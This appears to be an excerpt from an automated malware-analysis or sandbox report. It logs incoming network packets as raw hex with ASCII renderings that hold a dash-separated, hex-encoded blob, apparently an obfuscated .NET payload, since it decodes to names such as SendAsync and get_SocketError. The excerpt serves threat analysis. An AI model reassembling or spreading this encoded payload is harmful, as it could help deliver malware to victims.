2021-09-14 14:47:58 UTC	228	IN	Data Raw: 33 36 35 36 39 37 36 36 35 34 31 37 33 37 39 36 45 36 33 2d 2d 36 37 36 35 37 34 35 46 35 33 36 46 36 33 36 42 36 35 37 34 34 35 37 32 37 32 36 46 37 32 2d 2d 36 37 36 35 37 34 35 46 34 43 36 31 37 33 37 34 34 46 37 2d 36 35 37 32 36 31 37 34 36 39 36 46 36 45 2d 2d 36 37 36 35 37 34 35 46 34 32 37 39 37 34 36 35 37 33 35 34 37 32 36 31 36 45 37 33 36 36 36 35 37 32 37 32 36 35 36 34 2d 2d 36 37 36 35 37 34 35 46 34 32 37 35 36 36 36 36 36 35 37 32 2d 2d 35 32 36 35 37 33 36 39 37 41 36 35 2d 2d 34 33 36 46 36 43 36 43 36 35 36 33 37 34 2d 2d 36 37 36 35 37 34 35 46 34 46 36 36 36 36 37 33 36 35 37 34 2d 2d 35 33 36 35 36 45 36 34 34 31 37 33 37 39 36 45 36 33 2d 2d 35 2d 37 34 37 32 35 34 36 46 35 33 37 34 37 32 37 35 36 33 37 34 37 35 37 32 36 35 2d 2d Data Ascii: 3656976654173796E63--6765745F536F636B65744572726F72--6765745F4C6173744F7-65726174696F6E--6765745F42797465735472616E73666572726564--6765745F427566666572--526573697A65--436F6C6C656374--6765745F4F6666736574--53656E644173796E63--5-7472546F537472756374757265--
2021-09-14 14:47:58 UTC	236	IN	Data Raw: 2d 31 32 38 32 37 44 2d 38 32 2d 2d 33 31 44 2d 35 31 44 2d 35 2d 38 2d 38 2d 35 2d 37 2d 31 31 32 38 31 31 39 2d 35 32 2d 2d 32 2d 31 2d 45 2d 32 2d 35 2d 37 2d 33 2d 32 2d 38 2d 38 2d 37 32 2d 2d 33 2d 31 2d 32 2d 45 31 2d 2d 32 2d 34 2d 2d 2d 31 2d 31 2d 38 2d 38 2d 37 2d 32 31 32 38 2d 45 35 31 32 38 31 31 39 2d 38 2d 2d 2d 31 31 32 38 2d 45 31 31 32 38 2d 45 35 2d 37 2d 37 2d 35 2d 45 2d 45 2d 45 2d 45 2d 45 2d 35 2d 2d 2d 2d 31 32 38 32 42 35 2d 35 32 2d 2d 31 2d 45 31 44 2d 35 2d 38 2d 2d 2d 33 2d 32 2d 45 2d 45 31 31 38 32 42 31 2d 35 32 2d 2d 32 2d 45 2d 45 2d 45 2d 36 2d 2d 2d 31 2d 32 31 32 38 32 45 31 2d 35 2d 37 2d 32 2d 32 31 32 33 35 2d 33 2d 36 31 32 33 35 2d 36 32 2d 2d 32 31 32 33 35 2d 45 2d 32 2d 34 2d 2d 2d 31 2d 38 31 43 2d 36 2d 37 Data Ascii: -12827D-82--31D-51D-5-8-8-5-7-1128119-52--2-1-E-2-5-7-3-2-8-8-72--3-1-2-E1--2-4---1-1-8-8-7-2128-E5128119-8---1128-E1128-E5-7-7-5-E-E-E-E-E-5----1282B5-52--1-E1D-5-8---3-2-E-E1182B1-52--2-E-E-E-6---1-21282E1-5-7-2-21235-3-61235-62--21235-E-2-4---1-81C-6-7
2021-09-14 14:47:58 UTC	243	IN	Data Raw: 44 42 35 32 38 35 39 41 45 33 45 43 36 41 41 34 41 37 36 41 34 42 46 43 38 34 35 34 32 41 45 33 34 33 43 2d 32 44 31 44 36 42 36 43 37 35 42 38 39 42 38 33 32 46 44 38 35 35 34 41 36 31 42 37 37 41 43 33 37 34 43 32 46 35 2d 2d 41 35 41 35 33 34 33 45 37 37 35 31 32 41 42 35 32 33 32 44 38 39 39 36 41 36 43 44 39 39 37 46 44 42 36 2d 35 45 36 37 41 39 2d 36 39 33 34 41 45 32 31 41 42 44 36 37 37 35 2d 31 43 36 45 44 32 42 41 38 36 35 32 46 41 2d 46 31 35 42 36 2d 46 2d 32 37 31 46 35 45 41 41 32 2d 35 44 43 31 45 35 2d 32 45 37 34 44 31 39 44 38 38 39 36 46 2d 44 42 38 41 38 2d 34 37 36 32 36 2d 34 35 41 36 31 37 34 41 32 33 37 44 37 35 46 39 31 41 39 41 36 45 45 42 43 35 38 2d 45 35 31 42 43 2d 32 37 36 2d 41 32 44 35 2d 2d 42 38 31 43 37 33 43 35 31 43 Data Ascii: DB52859AE3EC6AA4A76A4BFC84542AE343C-2D1D6B6C75B89B832FD8554A61B77AC374C2F5--A5A5343E77512AB5232D8996A6CD997FDB6-5E67A9-6934AE21ABD6775-1C6ED2BA8652FA-F15B6-F-271F5EAA2-5DC1E5-2E74D19D8896F-DB8A8-47626-45A6174A237D75F91A9A6EEBC58-E51BC-276-A2D5--B81C73C51C
2021-09-14 14:47:58 UTC	250	IN	Data Raw: 32 38 35 33 33 35 43 44 2d 33 43 45 37 33 35 37 37 36 37 35 46 37 34 32 2d 42 2d 32 45 37 34 42 33 43 45 38 42 32 36 37 37 45 37 34 36 36 2d 31 43 31 37 34 37 37 34 38 42 45 43 36 37 35 31 42 42 2d 41 32 43 42 42 43 44 38 33 42 38 35 31 34 32 37 37 41 37 37 44 41 33 2d 43 32 45 32 37 33 36 38 38 44 41 37 37 44 45 44 32 33 45 37 36 45 34 44 44 43 43 32 31 43 42 2d 33 31 39 33 39 45 39 34 42 41 42 33 39 46 44 2d 39 33 42 43 32 39 35 44 42 45 45 37 39 41 46 34 34 37 41 37 37 35 38 43 37 32 45 35 41 32 44 42 41 2d 37 42 45 38 46 41 32 31 36 41 43 32 33 38 46 33 41 44 36 32 46 32 46 45 42 32 46 42 33 2d 2d 35 45 42 46 39 44 43 42 42 34 37 32 46 43 38 2d 31 41 44 43 35 2d 34 45 41 33 45 31 32 39 43 46 2d 32 36 43 2d 36 39 31 43 38 39 42 42 2d 37 37 34 34 34 46 Data Ascii: 285335CD-3CE73577675F742-B-2E74B3CE8B2677E7466-1C1747748BEC6751BB-A2CBBCD83B8514277A77DA3-C2E273688DA77DED23E76E4DDCC21CB-31939E94BAB39FD-93BC295DBEE79AF447A7758C72E5A2DBA-7BE8FA216AC238F3AD62F2FEB2FB3--5EBF9DCBB472FC8-1ADC5-4EA3E129CF-26C-691C89BB-77444F
2021-09-14 14:47:58 UTC	257	IN	Data Raw: 34 37 42 45 34 2d 38 46 33 43 45 42 44 46 32 38 45 41 39 45 36 39 32 36 38 34 37 35 46 45 45 39 43 46 44 33 34 46 37 44 2d 44 31 46 34 2d 38 33 2d 31 46 37 35 32 31 46 36 37 32 39 42 37 36 41 46 2d 32 46 42 46 36 39 35 31 43 31 34 36 44 2d 45 37 33 32 33 31 45 38 44 2d 35 39 37 32 43 43 38 33 2d 41 31 33 33 33 43 37 2d 45 44 32 43 35 32 32 38 37 2d 46 46 2d 31 36 38 41 34 32 38 34 44 2d 34 44 41 39 38 41 39 43 45 38 31 33 34 36 39 32 33 43 43 39 34 35 32 38 45 33 32 39 38 36 32 35 33 39 34 37 35 41 33 43 34 45 41 36 41 33 45 2d 33 34 46 33 2d 34 33 31 39 32 31 36 33 35 32 2d 44 38 2d 39 39 33 37 31 36 39 33 46 36 43 43 43 38 46 33 45 39 33 32 35 44 35 39 32 32 42 35 37 44 33 36 2d 39 43 41 36 36 35 37 44 2d 43 46 34 42 31 36 46 43 34 39 2d 33 38 44 37 38 Data Ascii: 47BE4-8F3CEBDF28EA9E69268475FEE9CFD34F7D-D1F4-83-1F7521F6729B76AF-2FBF6951C146D-E73231E8D-5972CC83-A1333C7-ED2C52287-FF-168A4284D-4DA98A9CE81346923CC94528E329862539475A3C4EA6A3E-34F3-4319216352-D8-99371693F6CCC8F3E9325D5922B57D36-9CA6657D-CF4B16FC49-38D78
2021-09-14 14:47:58 UTC	264	IN	Data Raw: 37 46 36 2d 33 35 36 38 2d 31 35 39 38 37 35 34 37 31 46 43 35 2d 41 46 37 2d 42 2d 32 46 43 38 44 45 39 35 34 2d 42 35 45 41 34 43 44 45 35 41 36 34 37 39 35 32 31 34 2d 33 45 2d 46 37 34 42 41 31 41 45 34 45 46 39 37 34 44 46 39 36 32 46 32 31 33 45 42 33 43 2d 41 42 32 46 46 39 37 36 32 39 37 34 35 33 36 45 42 39 35 43 43 45 44 31 31 45 45 39 41 31 35 41 31 38 43 45 43 33 2d 38 44 41 38 43 34 46 2d 44 42 45 42 39 44 37 44 34 41 45 36 36 46 37 31 33 34 43 44 41 33 43 46 31 42 43 38 33 2d 2d 32 36 43 39 34 34 2d 35 43 31 43 42 43 32 46 32 33 43 42 43 37 42 41 33 32 39 43 45 46 39 38 37 33 45 2d 32 45 42 38 36 45 34 39 45 44 41 33 32 37 36 34 36 46 34 44 39 43 42 45 35 31 45 46 36 35 45 38 31 31 38 41 42 46 41 32 42 43 41 32 44 38 38 31 42 44 42 42 42 38 Data Ascii: 7F6-3568-159875471FC5-AF7-B-2FC8DE954-B5EA4CDE5A64795214-3E-F74BA1AE4EF974DF962F213EB3C-AB2FF9762974536EB95CCED11EE9A15A18CEC3-8DA8C4F-DBEB9D7D4AE66F7134CDA3CF1BC83--26C944-5C1CBC2F23CBC7BA329CEF9873E-2EB86E49EDA327646F4D9CBE51EF65E8118ABFA2BCA2D881BDBBB8
2021-09-14 14:47:58 UTC	272	IN	Data Raw: 42 33 37 36 46 35 41 36 2d 41 42 46 32 46 43 35 33 45 31 32 33 39 44 37 36 43 45 34 45 33 42 33 35 31 43 42 32 39 41 32 2d 41 36 31 35 37 38 44 38 2d 41 43 46 33 2d 37 42 32 41 2d 46 45 41 2d 2d 31 34 35 46 38 41 37 44 42 36 35 38 41 36 42 43 39 39 43 35 37 35 41 31 2d 37 37 33 46 46 36 2d 45 32 39 37 32 31 41 2d 45 45 41 42 34 44 32 41 33 33 35 41 2d 34 32 41 37 41 42 43 41 39 44 33 39 41 36 34 32 35 33 32 34 42 35 35 38 36 46 39 45 42 32 43 33 42 31 34 42 38 2d 31 2d 39 34 37 43 34 38 35 35 43 45 36 32 39 31 35 46 42 37 41 43 2d 44 31 31 33 36 35 38 36 41 45 31 31 44 34 43 36 41 39 32 31 2d 31 45 42 31 33 43 45 45 45 43 43 33 32 2d 38 33 2d 36 33 31 45 33 38 45 31 37 41 38 41 32 43 36 2d 39 34 35 44 36 36 36 41 39 32 39 44 36 31 2d 45 32 36 34 38 31 45 Data Ascii: B376F5A6-ABF2FC53E1239D76CE4E3B351CB29A2-A61578D8-ACF3-7B2A-FEA--145F8A7DB658A6BC99C575A1-773FF6-E29721A-EEAB4D2A335A-42A7ABCA9D39A6425324B5586F9EB2C3B14B8-1-947C4855CE62915FB7AC-D1136586AE11D4C6A921-1EB13CEEECC32-83-631E38E17A8A2C6-945D666A929D61-E26481E
2021-09-14 14:47:58 UTC	279	IN	Data Raw: 39 35 2d 36 31 34 44 41 44 41 37 33 35 31 35 31 45 39 32 32 44 42 46 46 31 36 2d 2d 34 35 36 42 41 44 43 44 46 35 45 39 41 2d 42 43 38 33 37 38 43 32 45 38 41 39 34 46 31 38 32 44 43 31 45 33 36 37 31 37 44 34 37 33 37 34 39 36 34 31 38 35 46 38 41 41 2d 33 45 35 46 31 31 44 34 44 41 37 31 38 33 34 2d 44 2d 46 37 32 44 39 37 34 45 33 37 44 35 37 39 33 36 34 41 35 32 42 35 35 39 44 32 42 32 37 43 31 46 37 43 46 38 42 2d 33 42 38 44 32 31 32 39 38 37 41 41 34 39 33 43 34 38 36 41 2d 41 37 44 32 2d 37 38 44 36 35 38 31 41 39 46 36 38 39 31 33 35 32 2d 36 44 42 37 46 42 35 33 31 38 35 34 39 32 32 44 45 41 45 33 43 39 41 2d 39 36 35 41 31 2d 32 35 41 34 34 39 32 41 43 42 44 34 41 37 43 33 2d 31 41 45 35 33 37 43 42 41 31 35 39 2d 44 2d 2d 38 44 46 44 46 37 31 Data Ascii: 95-614DADA735151E922DBFF16--456BADCDF5E9A-BC8378C2E8A94F182DC1E36717D47374964185F8AA-3E5F11D4DA71834-D-F72D974E37D579364A52B559D2B27C1F7CF8B-3B8D212987AA493C486A-A7D2-78D6581A9F6891352-6DB7FB531854922DEAE3C9A-965A1-25A4492ACBD4A7C3-1AE537CBA159-D--8DFDF71
2021-09-14 14:47:58 UTC	286	IN	Data Raw: 31 41 36 35 45 31 32 45 39 36 35 37 38 43 41 45 46 37 44 39 46 41 36 35 34 32 38 35 32 35 44 2d 43 39 34 46 35 46 38 39 38 41 35 39 41 39 38 36 37 46 35 36 36 46 45 33 41 37 42 35 39 43 33 42 39 44 34 32 38 38 2d 41 44 36 34 37 44 44 41 45 42 45 33 41 37 43 35 38 35 31 2d 44 44 44 33 34 39 39 33 42 38 44 2d 39 39 31 34 31 35 35 42 37 32 41 44 46 33 33 32 39 43 44 38 2d 34 34 32 31 45 31 36 39 45 41 36 38 35 34 42 31 42 41 41 43 35 41 45 46 2d 42 44 34 39 2d 34 45 37 41 38 37 36 44 35 34 34 35 44 42 45 34 39 42 34 33 46 33 39 33 41 37 36 33 44 41 38 33 33 41 43 38 33 41 38 35 43 39 39 31 45 45 45 36 2d 46 36 33 34 34 2d 41 33 42 41 37 39 39 31 46 35 41 34 34 39 37 46 37 43 32 31 41 35 38 45 42 44 43 39 38 46 34 44 34 42 35 46 34 38 33 35 41 41 35 43 45 31 Data Ascii: 1A65E12E96578CAEF7D9FA65428525D-C94F5F898A59A9867F566FE3A7B59C3B9D4288-AD647DDAEBE3A7C5851-DDD34993B8D-9914155B72ADF3329CD8-4421E169EA6854B1BAAC5AEF-BD49-4E7A876D5445DBE49B43F393A763DA833AC83A85C991EEE6-F6344-A3BA7991F5A4497F7C21A58EBDC98F4D4B5F4835AA5CE1
2021-09-14 14:47:58 UTC	293	IN	Data Raw: 34 32 41 38 43 2d 32 33 44 2d 36 45 31 38 37 46 35 42 39 43 36 38 37 42 31 31 35 42 38 36 2d 42 39 33 46 41 44 42 41 38 43 45 37 35 2d 41 32 33 36 2d 35 46 35 43 36 2d 2d 41 46 38 35 42 31 45 42 33 2d 41 38 42 44 46 2d 37 39 35 36 36 43 31 34 2d 38 41 34 33 42 43 2d 32 36 34 44 38 42 33 46 36 39 36 38 31 34 34 33 33 32 32 31 46 42 37 35 45 39 39 31 46 2d 44 45 33 2d 35 35 38 2d 32 37 2d 34 38 44 41 41 43 39 39 46 46 46 34 31 35 46 34 36 41 45 38 39 43 34 2d 44 31 35 44 43 36 2d 2d 33 37 42 44 43 42 43 45 33 38 43 43 43 43 31 35 38 43 2d 44 34 34 32 34 31 32 34 41 39 35 2d 34 39 45 32 44 37 45 44 46 41 37 45 38 41 43 31 45 37 44 31 35 42 41 38 2d 45 35 45 46 43 32 38 33 36 45 33 46 43 39 44 31 41 45 44 43 43 43 31 43 37 44 46 2d 2d 45 45 34 44 37 44 42 36 Data Ascii: 42A8C-23D-6E187F5B9C687B115B86-B93FADBA8CE75-A236-5F5C6--AF85B1EB3-A8BDF-79566C14-8A43BC-264D8B3F696814433221FB75E991F-DE3-558-27-48DAAC99FFF415F46AE89C4-D15DC6--37BDCBCE38CCCC158C-D4424124A95-49E2D7EDFA7E8AC1E7D15BA8-E5EFC2836E3FC9D1AEDCCC1C7DF--EE4D7DB6
2021-09-14 14:47:58 UTC	301	IN	Data Raw: 42 35 38 37 2d 42 36 46 34 46 41 33 41 44 31 38 32 37 2d 38 34 2d 42 33 45 38 37 32 42 43 34 32 38 42 39 33 37 42 34 34 31 36 46 44 2d 31 34 44 38 45 36 39 2d 2d 42 36 32 35 43 31 46 33 32 42 31 45 39 43 44 31 33 32 36 35 33 35 45 36 43 32 46 36 39 32 36 2d 44 35 35 37 33 34 39 43 46 2d 2d 32 36 2d 46 38 45 38 46 2d 41 39 41 41 41 38 43 42 31 2d 42 35 41 37 34 43 33 39 35 38 45 2d 37 36 41 38 2d 39 33 45 31 33 32 31 35 38 41 38 2d 32 42 34 37 39 37 43 2d 2d 44 41 37 33 46 34 33 36 34 39 46 32 42 39 33 42 44 43 36 38 37 35 32 35 31 2d 32 39 39 37 32 39 43 34 46 41 31 42 44 33 43 44 34 31 31 34 39 38 34 32 33 32 38 32 42 37 34 2d 42 39 45 45 33 41 45 2d 37 46 33 35 32 32 33 35 31 39 35 31 31 46 41 33 33 36 46 31 31 34 31 39 34 36 43 35 41 44 33 46 36 34 39 Data Ascii: B587-B6F4FA3AD1827-84-B3E872BC428B937B4416FD-14D8E69--B625C1F32B1E9CD1326535E6C2F6926-D557349CF--26-F8E8F-A9AAA8CB1-B5A74C3958E-76A8-93E132158A8-2B4797C--DA73F43649F2B93BDC6875251-299729C4FA1BD3CD411498423282B74-B9EE3AE-7F35223519511FA336F1141946C5AD3F649
2021-09-14 14:47:58 UTC	308	IN	Data Raw: 39 41 38 32 46 35 2d 45 34 34 46 34 31 42 39 2d 2d 36 45 41 38 41 36 34 39 37 37 45 41 37 44 44 34 45 33 45 37 32 37 35 33 37 35 31 46 2d 41 35 39 45 46 37 43 43 46 39 42 46 36 39 31 45 44 2d 42 45 46 46 36 41 43 39 2d 35 2d 33 35 32 35 45 44 38 45 46 35 46 33 33 46 33 43 44 31 37 41 46 33 43 42 41 37 45 39 35 38 34 36 32 41 33 46 32 2d 44 36 43 39 43 46 31 43 42 42 2d 35 41 41 36 35 35 2d 32 42 46 35 37 2d 42 43 36 45 36 34 35 32 38 44 34 41 45 38 39 33 36 2d 44 38 2d 46 42 33 41 46 32 37 42 42 43 31 32 43 43 36 39 37 41 45 38 36 39 44 34 33 2d 34 32 45 31 2d 41 44 46 36 33 37 33 31 2d 34 46 34 36 38 43 44 44 33 35 2d 39 46 36 39 32 33 45 32 38 46 35 43 42 38 36 39 39 35 36 35 45 37 39 45 33 36 2d 36 43 32 44 42 31 38 34 41 38 32 42 41 32 33 31 32 34 46 Data Ascii: 9A82F5-E44F41B9--6EA8A64977EA7DD4E3E72753751F-A59EF7CCF9BF691ED-BEFF6AC9-5-3525ED8EF5F33F3CD17AF3CBA7E958462A3F2-D6C9CF1CBB-5AA655-2BF57-BC6E64528D4AE8936-D8-FB3AF27BBC12CC697AE869D43-42E1-ADF63731-4F468CDD35-9F6923E28F5CB8699565E79E36-6C2DB184A82BA23124F
2021-09-14 14:47:58 UTC	315	IN	Data Raw: 39 43 38 34 32 34 44 36 41 44 38 39 37 37 44 31 34 37 31 37 36 32 46 41 31 43 34 33 39 41 45 35 32 36 44 32 38 45 43 34 35 2d 41 2d 33 37 45 31 42 41 31 43 39 2d 35 33 31 35 2d 38 32 2d 36 33 39 43 38 46 46 36 36 37 43 31 43 43 39 45 43 33 45 45 33 2d 34 45 38 35 39 35 42 34 38 31 35 33 37 39 32 33 46 35 37 44 33 35 39 37 36 34 41 46 33 43 44 43 43 36 37 39 34 37 39 37 31 43 35 44 38 38 44 38 35 42 34 38 39 43 36 2d 42 36 41 38 2d 44 32 37 33 39 45 45 38 33 37 43 34 36 46 45 35 38 35 45 39 39 44 38 36 36 32 42 37 37 39 32 33 34 36 37 45 44 2d 41 44 42 2d 2d 2d 35 38 38 42 41 32 36 39 39 38 33 37 43 45 2d 32 46 34 43 42 31 35 42 35 33 46 39 37 45 35 45 43 44 45 45 32 45 39 37 33 31 41 46 46 46 43 39 33 35 33 46 41 37 34 43 33 35 39 34 39 35 35 39 31 36 35 Data Ascii: 9C8424D6AD8977D1471762FA1C439AE526D28EC45-A-37E1BA1C9-5315-82-639C8FF667C1CC9EC3EE3-4E8595B481537923F57D359764AF3CDCC67947971C5D88D85B489C6-B6A8-D2739EE837C46FE585E99D8662B77923467ED-ADB---588BA2699837CE-2F4CB15B53F97E5ECDEE2E9731AFFFC9353FA74C35949559165
2021-09-14 14:47:58 UTC	322	IN	Data Raw: 43 33 31 31 42 35 37 38 37 46 43 45 41 42 39 35 35 36 45 35 38 45 36 36 34 32 32 38 38 36 44 32 31 41 36 33 34 38 32 37 42 2d 32 41 39 31 31 41 33 35 31 32 42 34 33 39 35 34 45 36 43 38 33 37 42 35 36 35 2d 36 32 32 35 38 44 34 36 43 36 41 35 36 32 46 45 43 31 37 2d 44 45 32 44 31 31 39 33 32 44 35 43 42 37 2d 32 41 44 41 37 45 41 43 2d 46 34 32 39 45 46 44 45 37 45 38 38 35 35 45 37 34 2d 45 35 37 38 2d 45 31 46 33 45 45 43 46 31 43 41 45 42 45 39 36 38 42 46 42 2d 43 45 38 35 34 46 46 43 44 36 44 43 39 38 32 37 37 42 38 42 35 33 44 35 36 37 32 45 41 45 37 32 39 33 42 39 36 38 45 34 33 46 38 42 42 39 42 39 42 34 45 38 37 43 43 34 45 37 36 35 34 45 41 2d 39 38 33 42 45 31 35 43 45 38 37 39 43 37 33 44 42 35 38 46 35 46 31 36 42 46 46 45 45 33 31 33 45 39 Data Ascii: C311B5787FCEAB9556E58E66422886D21A634827B-2A911A3512B43954E6C837B565-62258D46C6A562FEC17-DE2D11932D5CB7-2ADA7EAC-F429EFDE7E8855E74-E578-E1F3EECF1CAEBE968BFB-CE854FFCD6DC98277B8B53D5672EAE7293B968E43F8BB9B9B4E87CC4E7654EA-983BE15CE879C73DB58F5F16BFFEE313E9
2021-09-14 14:47:58 UTC	330	IN	Data Raw: 34 34 41 34 33 32 38 42 44 2d 33 44 43 32 34 35 32 44 39 42 37 31 46 46 44 43 37 32 32 44 46 39 42 34 34 33 36 46 35 39 33 38 37 35 46 44 32 38 39 44 43 35 38 37 34 34 32 39 31 31 2d 33 44 32 31 38 38 41 46 42 41 42 31 37 43 46 38 34 45 34 2d 45 31 46 43 41 35 33 35 42 44 2d 32 35 35 45 46 39 41 43 2d 35 37 32 45 37 44 45 36 39 42 36 31 2d 34 31 35 37 46 44 44 41 37 43 46 38 32 41 45 42 44 43 41 43 43 33 2d 37 34 41 38 37 38 33 45 44 32 45 2d 45 32 38 38 33 39 46 43 36 31 42 42 37 38 44 41 33 38 43 44 34 34 35 31 36 36 32 45 31 42 37 44 37 39 45 32 45 34 43 35 38 31 44 39 42 32 37 39 46 34 31 35 42 31 39 31 41 2d 35 39 31 44 32 43 38 32 34 43 46 31 41 42 35 2d 39 42 46 31 31 2d 46 36 46 33 45 35 34 33 32 34 37 39 36 37 2d 35 39 39 32 33 34 36 39 45 32 2d Data Ascii: 44A4328BD-3DC2452D9B71FFDC722DF9B4436F593875FD289DC587442911-3D2188AFBAB17CF84E4-E1FCA535BD-255EF9AC-572E7DE69B61-4157FDDA7CF82AEBDCACC3-74A8783ED2E-E28839FC61BB78DA38CD4451662E1B7D79E2E4C581D9B279F415B191A-591D2C824CF1AB5-9BF11-F6F3E543247967-59923469E2-
2021-09-14 14:47:58 UTC	337	IN	Data Raw: 43 44 35 38 44 32 33 41 42 32 2d 33 46 36 32 43 36 44 2d 39 43 41 44 36 45 38 35 46 42 41 35 45 42 45 42 34 33 43 39 34 46 42 31 46 39 32 33 33 34 32 38 32 43 2d 37 34 36 2d 38 37 46 37 34 44 43 42 35 46 34 44 32 34 45 32 36 37 32 41 2d 44 32 38 46 46 32 45 46 44 33 2d 33 41 38 46 36 43 46 42 37 34 41 32 31 42 34 36 39 42 35 34 44 31 34 42 35 41 42 44 45 33 43 31 39 33 43 37 43 37 2d 46 2d 36 39 38 35 33 39 38 46 32 41 35 36 33 42 45 31 34 43 34 45 34 43 2d 38 2d 33 43 39 39 38 38 45 33 34 36 37 41 33 31 36 34 34 44 45 36 33 2d 32 45 39 38 35 42 34 36 43 32 42 46 46 43 36 45 45 34 38 2d 31 35 45 31 38 42 35 35 42 41 36 38 42 39 42 45 43 34 41 38 35 41 44 41 46 36 31 2d 43 39 31 38 33 37 36 39 43 42 41 33 44 31 45 44 32 44 36 2d 45 44 45 37 34 43 46 31 43 Data Ascii: CD58D23AB2-3F62C6D-9CAD6E85FBA5EBEB43C94FB1F92334282C-746-87F74DCB5F4D24E2672A-D28FF2EFD3-3A8F6CFB74A21B469B54D14B5ABDE3C193C7C7-F-6985398F2A563BE14C4E4C-8-3C9988E3467A31644DE63-2E985B46C2BFFC6EE48-15E18B55BA68B9BEC4A85ADAF61-C9183769CBA3D1ED2D6-EDE74CF1C
2021-09-14 14:47:58 UTC	344	IN	Data Raw: 45 37 41 35 39 41 46 33 42 42 32 32 35 37 42 36 2d 41 37 35 34 42 43 43 37 43 32 38 44 44 36 41 34 31 36 46 35 39 31 33 43 34 42 44 33 44 37 44 39 41 42 32 36 34 37 34 44 36 31 43 32 43 45 46 46 41 39 46 32 33 39 2d 44 32 42 34 34 44 33 43 36 34 31 32 46 43 44 35 33 33 42 36 31 44 34 46 41 31 31 37 34 46 32 42 36 36 37 46 2d 45 31 32 33 31 32 31 31 38 42 46 33 43 32 41 32 35 43 45 34 31 31 32 2d 33 44 46 2d 42 34 31 37 37 44 2d 41 34 44 33 45 32 44 37 33 36 36 45 32 42 2d 35 44 42 45 35 2d 34 43 39 45 2d 42 44 43 31 37 38 35 2d 34 45 36 43 37 42 45 2d 33 33 38 37 43 42 38 41 31 42 32 36 35 2d 2d 43 41 32 35 43 46 34 32 32 33 2d 38 41 44 46 38 37 33 37 45 44 32 43 31 45 36 2d 35 36 43 34 2d 46 34 2d 32 32 32 38 46 2d 35 37 35 38 41 38 34 32 43 2d 38 2d 38 Data Ascii: E7A59AF3BB2257B6-A754BCC7C28DD6A416F5913C4BD3D7D9AB26474D61C2CEFFA9F239-D2B44D3C6412FCD533B61D4FA1174F2B667F-E12312118BF3C2A25CE4112-3DF-B4177D-A4D3E2D7366E2B-5DBE5-4C9E-BDC1785-4E6C7BE-3387CB8A1B265--CA25CF4223-8ADF8737ED2C1E6-56C4-F4-2228F-5758A842C-8-8
2021-09-14 14:47:58 UTC	351	IN	Data Raw: 41 32 34 32 34 43 32 41 44 31 45 34 35 33 31 43 34 44 31 34 46 36 31 38 35 2d 45 43 34 31 46 2d 43 34 43 38 39 42 37 34 37 34 43 38 36 36 41 37 36 32 45 32 2d 32 2d 46 44 43 35 2d 37 33 38 37 35 37 33 42 38 36 37 37 42 37 32 38 35 39 41 2d 33 44 38 34 36 38 36 35 37 44 36 32 45 37 38 41 33 39 39 33 2d 39 43 32 44 36 45 43 33 41 45 33 45 35 38 46 41 2d 46 35 39 32 43 39 34 2d 41 34 33 45 45 41 45 41 42 33 41 34 31 31 33 33 38 35 45 46 33 43 45 38 35 46 39 2d 36 2d 44 39 46 46 42 44 34 36 42 35 38 43 36 45 33 39 39 2d 2d 43 31 33 41 37 39 39 32 45 45 34 34 42 31 42 42 45 45 43 46 34 34 36 42 33 41 41 32 43 32 43 36 45 35 43 38 39 44 41 43 39 45 45 32 33 44 32 43 41 39 46 32 34 46 35 44 32 34 2d 2d 44 45 32 31 44 44 44 2d 33 38 43 33 32 36 33 32 44 36 2d 34 Data Ascii: A2424C2AD1E4531C4D14F6185-EC41F-C4C89B7474C866A762E2-2-FDC5-7387573B8677B72859A-3D8468657D62E78A3993-9C2D6EC3AE3E58FA-F592C94-A43EEAEAB3A4113385EF3CE85F9-6-D9FFBD46B58C6E399--C13A7992EE44B1BBEECF446B3AA2C2C6E5C89DAC9EE23D2CA9F24F5D24--DE21DDD-38C32632D6-4
2021-09-14 14:47:58 UTC	359	IN	Data Raw: 43 38 31 45 46 32 35 37 36 46 38 45 35 46 38 39 35 41 34 46 39 46 39 35 31 34 2d 32 34 2d 43 38 33 2d 41 34 33 45 31 37 45 31 37 34 43 42 2d 35 39 37 42 44 37 37 45 44 43 31 39 44 38 32 43 45 2d 2d 45 45 41 35 46 38 41 32 42 34 38 34 43 41 42 42 38 38 46 42 45 34 31 44 32 43 2d 34 43 36 39 2d 44 31 42 42 2d 46 38 43 39 31 31 32 31 32 33 43 38 37 45 36 32 31 45 39 35 46 44 42 37 33 44 34 36 34 34 31 32 38 31 39 33 41 32 44 35 41 32 31 35 46 33 38 37 34 34 2d 41 35 38 42 43 38 33 37 37 38 34 45 43 45 45 36 44 46 32 46 31 43 45 2d 34 41 37 33 45 34 32 42 36 43 34 41 41 39 2d 31 42 39 2d 42 35 39 35 32 32 38 2d 36 46 45 46 38 37 46 2d 46 41 45 33 45 38 43 46 38 2d 41 37 43 37 2d 46 36 41 45 37 43 45 41 31 36 35 35 34 42 44 39 42 43 38 38 41 44 36 34 39 34 2d Data Ascii: C81EF2576F8E5F895A4F9F9514-24-C83-A43E17E174CB-597BD77EDC19D82CE--EEA5F8A2B484CABB88FBE41D2C-4C69-D1BB-F8C9112123C87E621E95FDB73D4644128193A2D5A215F38744-A58BC837784ECEE6DF2F1CE-4A73E42B6C4AA9-1B9-B595228-6FEF87F-FAE3E8CF8-A7C7-F6AE7CEA16554BD9BC88AD6494-
2021-09-14 14:47:58 UTC	366	IN	Data Raw: 45 39 45 35 41 41 42 41 2d 34 34 44 31 38 35 37 41 41 43 31 36 37 44 46 42 42 41 36 45 38 34 38 44 32 36 31 31 35 34 43 42 41 37 36 41 42 31 34 45 45 44 45 45 45 43 32 41 39 45 39 33 38 33 31 36 41 35 31 36 37 36 45 39 44 46 32 45 35 43 42 39 33 39 32 43 33 31 45 42 36 31 34 31 32 43 34 33 41 2d 41 33 45 34 46 46 38 43 34 43 37 31 35 39 31 33 46 2d 44 38 45 35 39 44 36 38 2d 38 37 35 32 36 41 44 38 35 43 32 32 37 46 39 45 41 43 45 37 44 33 42 44 36 34 42 37 45 33 42 39 37 2d 36 34 32 46 34 2d 39 46 31 46 37 36 2d 2d 44 46 42 41 38 33 44 41 38 39 42 35 41 32 34 33 42 42 32 31 41 41 33 35 32 43 32 43 36 39 35 42 43 34 45 2d 46 38 32 33 32 45 39 39 32 31 34 38 35 42 36 2d 33 36 31 45 37 35 35 32 44 41 32 43 33 2d 35 34 2d 32 32 39 34 37 43 2d 43 31 31 35 36 Data Ascii: 